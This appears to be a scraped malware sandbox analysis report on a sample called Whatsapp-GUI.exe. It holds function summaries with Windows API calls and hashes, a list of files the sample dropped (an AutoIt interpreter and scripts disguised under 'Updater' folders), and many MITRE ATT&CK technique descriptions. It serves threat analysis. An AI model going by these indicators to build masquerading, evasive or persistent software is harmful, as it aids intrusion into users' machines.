Part of subcall function 0472387C: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08004000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08004000), ref: 0472399F
Part of subcall function 0472387C: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08004000,00000000,00000000,00000044,?,00000000,04723A50), ref: 04723A23

Strings

.exe, xrefs: 04723452
OPEN, xrefs: 04723487

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CreateProcess$ExecuteObjectShellSingleWait
String ID: .exe$OPEN
API String ID: 2960631408-879745837
Opcode ID: 028479fa5aaf5ee0721696962f76c6ac8cf2e783a76065e3d112b00e45fcc8f7
Instruction ID: 00fd7c8cfe31765071b4882e8975208108918aa7c40a10ba43bfc797be162e3c
Opcode Fuzzy Hash: 028479fa5aaf5ee0721696962f76c6ac8cf2e783a76065e3d112b00e45fcc8f7
Instruction Fuzzy Hash: DD01A270704624BBE301EAF4CF52F6A72A8DB48604F1188A0BD04E7750E678FE005598

Function 00C98892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C988A0

Part of subcall function 00C63588: _doexit.LIBCMT ref: 00C63592

Strings

Error allocating memory., xrefs: 00C98899
AutoIt, xrefs: 00C98894

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: e2f9b67d90b8d1b266a9363a85de6c80d616785f513ad7fefa0118e8753ece72
Instruction ID: 134f796ab661f1cac7255458443d7ae4f6e36336e29436bd0a4460860f8bc983
Opcode Fuzzy Hash: e2f9b67d90b8d1b266a9363a85de6c80d616785f513ad7fefa0118e8753ece72
Instruction Fuzzy Hash: 10D05B7138535832D26476A86D0BFDE7F488B15B51F144437FF08661C389D5C9D151EA

Function 00C80251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00C80091

Part of subcall function 00CBC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00C8027A,?), ref: 00CBC6E7
Part of subcall function 00CBC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CBC6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C80289

Strings

WIN_XPe, xrefs: 00C800A4

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: ba9839111c7bdf43e388529924e134f35dfa074ec4defcd1ab3ae2b40e2f612b
Instruction ID: 1bc2fc904912c51986cbc9d66e864902a0016b5c90a08352b18864501b319061
Opcode Fuzzy Hash: ba9839111c7bdf43e388529924e134f35dfa074ec4defcd1ab3ae2b40e2f612b
Instruction Fuzzy Hash: 2EF03971805109DFCB55EBA5C988BECBBF8AB08304F340096E156A2190CB705F88DF24

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Whatsapp-GUI.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Updater.zip

C:\ProgramData\Updater\Autoit3.exe

C:\ProgramData\Updater\ConfigUpdater.a3x (copy)

C:\ProgramData\Updater\UpdaterService.exe (copy)

C:\ProgramData\Updater\script.a3x

C:\ProgramData\addbage\Autoit3.exe

C:\ProgramData\addbage\ecbdahe

C:\ProgramData\addbage\ffdghbb.a3x

C:\ProgramData\addbage\gcdkfcc

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Whatsapp-GUI.exe.log

C:\Users\user\AppData\Roaming\ccfbbHC

C:\temp\dehbgch

Windows Analysis Report
Whatsapp-GUI.exe

Function 0A52CB10 Relevance: 9.1, Strings: 7, Instructions: 390
COMMON

Function 0A5258D0 Relevance: 5.3, Strings: 4, Instructions: 269
COMMON

Function 0190AD48 Relevance: 1.7, APIs: 1, Instructions: 210
COMMON

Function 0190590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 019044B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0A521070 Relevance: 1.6, APIs: 1, Instructions: 77
windowCOMMON

Function 091ECDA0 Relevance: 1.6, APIs: 1, Instructions: 66
windowCOMMON

Function 0190D21C Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre